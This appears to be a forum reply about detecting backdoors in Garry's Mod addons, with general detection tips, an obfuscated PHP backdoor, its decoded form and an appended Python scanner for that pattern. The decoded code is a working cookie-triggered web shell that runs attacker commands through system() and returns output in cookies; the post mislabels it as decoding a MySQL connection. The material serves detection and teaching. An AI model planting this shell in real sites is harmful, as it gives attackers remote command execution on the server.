Garry's Mod

How to spot backdoor addons?

Submitted by yushikiki, Thread ID: 142410

Thread Closed

RE: How to spot backdoor addons?

This post was last modified: 06-09-2019, 01:36 PM by Zendra
#4
There are many tips for spotting the backdoor... but if the developer is good... it's gonna be hard to detect it...

First, you probably need to analyze the traffic on your computer, with Wireshark for example, and detect which port, program and other stuff is actually using it (you are probably going to encounter something strange... well, write it down in a notepad, you can analyze it afterwards).

Second, you can block the traffic on the port to temporarily stop the connection to the hacker.

In the end you probably need to know a bit of assembly and attach a debugger to the program/dll/file that has the backdoor (OllyDbg is good, but you can follow with IDA Pro or x96).... That's really hard to complete, so my advice is: if you are not a researcher, just copy all the important files to an external HD and format your PC.

It's really hard to spot a backdoor even if you have the source code, because all the backdoors are usually encrypted, hashed and obfuscated into another file. There is an example of a backdoor on my site, from a long time ago!


<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>


Decoded:

<?php if (isset($_COOKIE['cm'])) {                      // trigger: only fires when a 'cm' cookie is sent
ob_start();                                              // buffer all output so nothing appears in the page
system(base64_decode($_COOKIE['cm']) . ' 2>&1');         // run the base64 command from the cookie, stderr included
setcookie($_COOKIE['cn'], $_COOKIE['cp'] . base64_encode(ob_get_contents()) . $_COOKIE['cp']); // return the output in a response cookie, wrapped by the 'cp' marker
ob_end_clean();                                          // discard the buffer so the page looks untouched
}

That's a backdoor, for example, to decode the MySQL connection.
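As an added illustration (not code from the original post), a small Python checker that statically unwraps the obfuscation shape shown above (a strrev-built function name, a space-padded base64 string inside str_replace, then eval) and flags the decoded payload when it feeds request data into a command-execution function. The sample PHP is constructed here by re-wrapping the decoded backdoor from the post; the sink and input lists are assumptions, not a complete catalogue.

```python
import base64
import re

# PHP functions that hand a string to the OS shell, and the request superglobals an attacker controls.
DANGEROUS_SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
USER_INPUT = ("$_COOKIE", "$_GET", "$_POST", "$_REQUEST")
# Constructed sample: the decoded backdoor from the post, re-wrapped in the same
# obfuscation shape (reversed function name, space-padded base64, eval).
DECODED_SHELL = (
    b"if (isset($_COOKIE['cm'])) { ob_start(); system(base64_decode($_COOKIE['cm']) . ' 2>&1'); "
    b"setcookie($_COOKIE['cn'], $_COOKIE['cp'] . base64_encode(ob_get_contents()) . $_COOKIE['cp']); ob_end_clean(); }"
)
SAMPLE_PHP = (
    '<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","'
    + " ".join(base64.b64encode(DECODED_SHELL).decode()) + '"))); ?>'
)

def resolve_strrev(src):
    """Return the function name hidden by strrev("..."."..."), or None if absent."""
    m = re.search(r'strrev\(((?:"[^"]*"\s*\.?\s*)+)\)', src)
    if not m:
        return None
    return "".join(re.findall(r'"([^"]*)"', m.group(1)))[::-1]

def extract_blob(src):
    """Strip the spaces out of str_replace(" ","","...") and base64-decode the result."""
    m = re.search(r'str_replace\(" ",\s*"",\s*"([^"]*)"\)', src)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1).replace(" ", ""), validate=True).decode("utf-8", "replace")
    except ValueError:  # not valid base64 after all
        return None

def scan_php(src):
    """Return human-readable findings for one PHP source string (empty list means nothing matched)."""
    findings = []
    hidden = resolve_strrev(src)
    if hidden:
        findings.append(f"strrev hides call to {hidden}")
    if re.search(r"\beval\s*\(", src):
        findings.append("eval of a runtime-built string")
    payload = extract_blob(src)
    if payload:
        sinks = [s for s in DANGEROUS_SINKS if re.search(rf"\b{s}\s*\(", payload)]
        inputs = [v for v in USER_INPUT if v in payload]
        if sinks and inputs:
            findings.append(f"decoded payload passes {', '.join(inputs)} to {', '.join(sinks)}")
    return findings
```

Run scan_php over each .php file in an addon and review any file that produces findings; a clean file returns an empty list.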
